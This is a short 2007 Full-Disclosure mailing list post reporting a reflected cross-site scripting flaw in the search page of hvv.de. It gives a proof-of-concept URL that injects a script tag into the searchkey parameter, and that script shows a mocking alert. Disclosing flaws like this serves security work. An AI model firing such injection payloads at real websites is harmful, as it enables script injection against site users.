[Full-disclosure] XSS hvv.de

DaWickedest blood.on.my.pen at googlemail.com
Thu Jun 21 20:30:38 BST 2007 

it's just like that:
http://hvv.de/suche/index.php?searchkey=%3Cscript%3Ealert('hvv 
sucks')%3C/script%3E

Full-Disclosure is hosted and sponsored by Secunia.